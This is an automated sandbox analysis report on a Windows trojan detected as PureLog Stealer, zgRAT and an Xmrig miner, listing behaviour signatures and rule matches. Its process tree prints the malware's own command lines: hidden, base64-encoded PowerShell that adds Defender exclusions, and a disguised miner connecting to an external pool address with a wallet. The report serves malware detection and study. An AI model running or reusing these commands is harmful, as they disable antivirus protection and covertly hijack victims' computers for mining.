Windows
Analysis Report
SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Overview
General Information
Detection: PureLog Stealer, Xmrig, zgRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Downloads files with wrong headers with respect to MIME Content-Type
Encrypted powershell cmdline option found
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Child Process of AspNetCompiler
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe (PID: 5904 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe" MD5: D18E6C991FA548D0CF39EA1586738D2F)
- SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe (PID: 412 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe" MD5: D18E6C991FA548D0CF39EA1586738D2F)
- powershell.exe (PID: 1560 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Keywords.exe (PID: 1568 cmdline: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe MD5: D18E6C991FA548D0CF39EA1586738D2F)
- Keywords.exe (PID: 64 cmdline: "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe" MD5: D18E6C991FA548D0CF39EA1586738D2F)
- MSBuild.exe (PID: 4456 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- MSBuild.exe (PID: 6972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- powershell.exe (PID: 4668 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- fdyryi.exe (PID: 6100 cmdline: C:\Users\user\AppData\Local\Temp\fdyryi.exe MD5: 14E3B32935D7CC340AD1AF8EAE56505B)
- fdyryi.exe (PID: 3852 cmdline: "C:\Users\user\AppData\Local\Temp\fdyryi.exe" MD5: 14E3B32935D7CC340AD1AF8EAE56505B)
- Keywords.exe (PID: 512 cmdline: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe MD5: D18E6C991FA548D0CF39EA1586738D2F)
- Keywords.exe (PID: 1568 cmdline: "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe" MD5: D18E6C991FA548D0CF39EA1586738D2F)
- powershell.exe (PID: 4172 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AYQBtAGUAZABQAGUAcgBtAGkAcwBzAGkAbwBuAFMAZQB0AHMAXABBAGwAZwBvAHIAaQB0AGgAbQBUAHkAcABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABiAHIAbwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGEAbQBlAGQAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABzAFwAQQBsAGcAbwByAGkAdABoAG0AVAB5AHAAZQAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 2932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- AlgorithmType.exe (PID: 5892 cmdline: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe MD5: 14E3B32935D7CC340AD1AF8EAE56505B)
- AlgorithmType.exe (PID: 6812 cmdline: "C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe" MD5: 14E3B32935D7CC340AD1AF8EAE56505B)
- aspnet_compiler.exe (PID: 5572 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: DF5419B32657D2896514B6A1D041FE08)
- aspnet_compiler.exe (PID: 4648 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)
- pjmskbbdr.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe" MD5: E0DF4BE1D5288BC84AE493177B88D175)
- RegAsm.exe (PID: 3560 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- AddInProcess.exe (PID: 3844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
- AddInProcess.exe (PID: 2440 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | |
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution | |
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Category | Author
---|---
Bitcoin Miner | Joe Security
System Summary | Florian Roth (Nextron Systems)
System Summary | Kiran kumar s, oscd.community
System Summary | Nasreddine Bencherchali (Nextron Systems)
System Summary | frack113
System Summary | frack113
System Summary | frack113
System Summary | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
No Snort rule has matched
AV Detection |
---|
Source: | Avira: |
Source: | URL Reputation: |
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Bitcoin Miner |
---|
Source: | File source: |
Source: | TCP traffic: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Key opened: |
Source: | Code function: | 0_2_05F5C70E |
Source: | Code function: | 0_2_05F5AF80 |
Source: | Code function: | 0_2_05F5AF70 |
Source: | Code function: | 5_2_05D3B1D0 |
Source: | Code function: | 5_2_05D3BD37 |
Source: | Code function: | 5_2_05D3BD38 |
Source: | Code function: | 15_2_00007FF7C1064A58 |
Source: | Code function: | 23_2_00007FF7C1044A58 |
Networking |
---|
Source: | TCP traffic: |
Source: | Bad PDF prefix: |